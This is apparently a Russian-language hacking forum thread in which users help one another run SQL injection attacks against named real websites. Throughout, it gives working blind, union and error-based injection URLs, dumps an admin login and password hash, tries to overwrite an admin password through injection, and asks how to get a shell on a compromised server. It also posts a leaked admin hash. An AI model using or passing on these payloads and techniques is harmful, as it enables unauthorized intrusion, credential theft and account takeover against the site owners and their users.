Ваши вопросы по уязвимостям.

http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3&fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver=test9&msg=test10

и эта не работает
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3&fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10

слепая скуль, что то делаю не так (перебираю a-z)
http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(substring((SELECT%20os%20FROM%20log),1,1))

подскажите чего нибудь

 

1 - просто вывод того, что передали параметром.

2.
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(version(),1,1))>0,1,0))
меняешь >0 и подбираешь код символа. через char() можешь получить его значение.

 

кстати ascii не работает
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(lower(substr('1',1,1)))=31,1,0))

 

http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr(version(),1,1))='5',1,0))

вот так фурычит

 

только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется

 

что не так?

Code:

http://fvsn.org/download.php?id=(18296)and(1)=if(mid((select(version())),1,1)=5,1,0)

 

Code:

http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((select count(table_name) from information_schema.tables),1,1))=49,1,0))

Тут тоже не фильтруется.

 

такая ситуация:
обычная скуль..ничего не фильтруется, трудностей не возникло вообще до получения login;pass админа. Хочу получить шелл, НО:
1. Не могу найти панель администратора. Такое впечатление, что на самом сайте ее вообще нет.
2. Нет прав у текущего юзверя под которым работает БД на то чтобы залить шелл средствами с ку эль.

Есть какие еще варианты получения шелла?

Чтобы не быть голословным привожу линк
http://banksbattle.ru/333.php?archiv=-59+union+select+1,concat(login,0x20,password),3,4,5,6+from+admins--

жду ваших предложений=)

 

блин у меня сейчас голова взарвётся. как так это работает.

ведь это не работает
http://fvsn.org/download.php?id=(18296)and%20ascii('1')=31

, а в ней ascii

я сейчас сума сойду, как в первом выражении ascii прошло, а в моём не проходит, объясните пожалуйста?

 

потому результат работы функции ascii('1')=49, а в условии у тебя ascii('1')=31, т.е. 49=31, т.к. 49 не равно 31 возвращается false и в ответ ничего не приходит!

 

блин сильно туплю. я то подставляю 31h=49=ascii('1')

Спасибо.

начал программулину писать которая выдернет имена столбцов. Возможно я лишную работу делаю. Может кто знает софтину какую нибудь для слепых SQL. Я тут нашёл BSQL Haker но она какая то ограниченая не подходит для данного случая

 

https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(id)/**/from/**/fontan.mp_gw_auth/**/limit/**/0,1),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'

 

удалось мне выдернуть структуру таблиц. логин и хеш пароль админа, но вот с расшифровкой проблема

root
cb4616f2ab30f37f6facf7e61036a5ec

пытаюсь проапдейтить запись на пароль 123, но похоже что то не так вписываю, если эта запись вообще возможна тут.

пароль получается так md5(md5(salt(pass))); судя по исходникам DataLive Engine.

salt='abchefghjkmnpqrstuvwxyz0123456789';

PHP:

$salt = "abchefghjkmnpqrstuvwxyz0123456789";              srand( ( double ) microtime() * 1000000 );                            for($i = 0; $i < 9; $i ++) {                  $new_pass .= $salt{rand( 0, 33 )};              }                            $db->query( "UPDATE " . USERPREFIX . "_users set password='" . md5( md5( $new_pass ) ) . "', allowed_ip = '' WHERE user_id='$douser'" );              $db->query( "DELETE FROM " . USERPREFIX . "_lostdb WHERE lostname='$douser'" );

http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr((UPDATE%20dle_users%20set%20password='d9b1d7db4cd6e70935368a1efb10e377',allowed_ip=''),1,1))='5',1,0))

 

Mr.aids,
1. нельзя делать апдейт в подзапросе.
2. md5(md5(salt(pass))) - не так, а md5(md5($pass . $salt)), где $salt = 9 random symbols from 'abchefghjkmnpqrstuvwxyz0123456789'.
3. Хз как в дле, но судя по коду, там должна быть отдельная колонка с солью в базе.

 

да я туплю опять жестоко. код который я привёл с md5 md5 salt это генерация нового пароля. а проверка и регистрация обычным способом идёт

PHP:

    $user = $db->safesql( trim( $user_arr[0] ) );      $email = $db->safesql( trim( $user_arr[1] ) );      $pass = md5( $user_arr[2] );        if( md5( sha1( $user . $email . DBHOST . DBNAME . $config['key'] ) ) != $user_arr[3] ) die( 'ID not valid!' );        if( preg_match( "/[\||\'|\<|\>|\[|\]|\"|\!|\?|\$|\@|\/|\\\|\&\~\*\{\+]/", $user ) ) die( 'USER not valid!' );        $row = $db->super_query( "SELECT * FROM " . USERPREFIX . "_users WHERE name = '$user' AND password='$pass'" );  

md5 без соли. А можно как то сделать запрос что бы сделать апдейт?

 

и не могу понять что с таблицей columns, судя по информации из tables таблица есть. Но все запросы терпят неудачу

http://fvsn.org/download.php?id=(18296)and%201=(if(ascii(substr((select%20column_name%20from%20information_schema.columns%20limit%206,1),2,1))=86,1,0))

перебираю все символы нет реакции

 

С чего ты взял что второй символ запроса select column_name from information_schema.columns limit 6,1 равен букве V?
Настоятельно рекомендую тебе прочесть статью: http://forum.antichat.ru/thread43966.html
И если в следующий раз думай прежде чем задать вопрос, иначе сообщение будет ликвидироваться.

 

Никак ты апдейт не сделаешь в твоем случае! В MSSQL получилось бы. Лучше выдерни хэш и соль, и кинь в соответствующею темку расшифровки хешей.